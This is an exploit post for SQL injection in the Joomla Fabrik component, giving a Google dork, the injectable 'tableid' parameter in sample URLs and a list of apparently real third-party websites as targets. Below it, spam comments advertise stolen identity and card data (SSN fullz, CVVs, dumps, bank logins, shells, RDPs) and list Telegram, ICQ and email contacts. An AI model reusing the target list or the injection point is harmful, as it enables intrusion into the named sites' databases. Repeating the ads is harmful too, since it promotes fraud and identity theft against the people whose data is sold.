[*] Exploit Títle : Vulnerabilities Joomla Fabrik - SQLi and BlindSQLi
[*] Exploit Author : Dark23
[*] Versión : 1.5
[*] Tested on : Window and Linux
[*] Google dork : [inurl:index.php?option=com_fabrik]
-------------------------------
# ~ Exploitation ~ #
-------------------------------
Concept :
SQL Injection is a method of infiltration arbitrary code that uses a computer vulnerabilities present in an application-level input validation to query a database.
The origin of the vulnerability lies in the wrong check and / or filtering of the variables used in a program that contains.
Variable : tableid
http://www.target.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=98&Itemid=75
PoC - SQLi.
Variable : tableid
http://www.taget.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=5&resetfilters=10&Itemid=94&lang=es
Example:
[*] http://feceminte.cat/index.php?option=com_fabrik&view=table&tableid=4&calculations=0&Itemid=159&lang=es&act1=1
[*] http://osaarchivum.org/index.php?option=com_fabrik&view=table&tableid=5&calculations=0&Itemid=1520&lang=en&limitstart5=450
[*] http://www.alcaniz.es/index.php?option=com_fabrik&view=table&tableid=8&calculations=0&resetfilters=0&Itemid=466
[*] http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85
[*] http://www.ipse.gov.co/ipseactual2013/index.php?option=com_fabrik&view=table&tableid=6&calculations=0&resetfilters=0&Itemid=96&lang=es
[*] http://healthcare-resourcesgroup.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&Itemid=267&limitstart13=20
[*] http://www.statmedicalsearch.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&fabriklayout=default&Itemid=273&&limitstart13=40
SSN FULLZ AVAILABLE
ResponderEliminarFresh & valid spammed USA SSN+Dob Leads with DL available in bulk & high credit 700+
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of Tools & Tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SQL Injector
Premium Accounts (Netflix, Pornhub, etc)
Paypal Logins
Bitcoin Cracker
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
FULLZ/PROS/LEADS AVAILABLE
ResponderEliminarFreshly spammed & never sold before
UK|CANADA|USA Countries Fullz
Genuine & Guaranteed Stuff will be provide
Invalid & Dead Info will be replace Instantly
Fullz Details
FULL NAME|SSN||DOB|DL|ADDRESS|CITY|STATE|ZIP|PHONE|EMPLOYEE & BANK DETAILS
CC Fullz with CVV (UK|USA|CANADA|BRAZIL|AUSTRALIA|ASIA)
CC NUMBER|EXP MN|EXP YR|CVV|FULLZ NAME|SSN|DOB|ADDRESS|PHONE|EMAIL
Business EIN FULLZ
Dumps with Pin codes 101 202
DL Scan Front & Back with SSN
High Credit Scores Pros 700+
Bulk quantity available
You can asked for specific Dob, states, zip codes
For Order
"ICQ"-----------752822040 | @killhacks
"Telegram"------@killhacks | @leadsupplier
"Email"---------hacksp007 @dnmx.org
Other Stuff
SMTP's|RDP's|SHELLS|BRUTES|C-PANELS
WEB-MAILERS|SENDERS
I.P's|Proxies
Email Leads
Office365 Emails|logins
You can asked for the stuff you need
We'll provide you Legit & Working Stuff